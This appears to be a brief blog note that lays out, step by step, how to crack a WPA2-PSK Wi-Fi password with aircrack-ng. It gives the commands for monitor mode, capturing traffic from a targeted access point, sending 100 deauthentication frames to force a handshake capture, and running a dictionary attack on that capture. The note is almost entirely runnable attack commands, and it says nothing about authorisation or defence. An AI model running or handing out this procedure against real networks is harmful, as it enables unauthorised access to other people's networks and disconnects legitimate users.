Aircrack-Ng

[url]http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/[/url]
Step0: Preparation
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to fix problem:
[quote]13:45:36 Waiting for beacon frame (BSSID: 1C:FA:68:96:72:1C) on channel -1
13:45:36 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch[/quote]
Step1:Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng
airmon-ng start wlan0
Step 2:Capture Traffic with Airodump-Ng
airodump-ng mon0
Step 3: Focus Airodump-Ng on One AP on One Channel
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
[color=blue]
08:86:30:74:22:76 is the BSSID of the AP
-c 6 is the channel the AP is operating on
WPAcrack is the file you want to write to
mon0 is the monitoring wireless adapter*
[/color]
Step 4: Aireplay-Ng Deauth
aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
Step 5: Capture the Handshake
Step 6: Let's Aircrack-Ng That Password!
aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值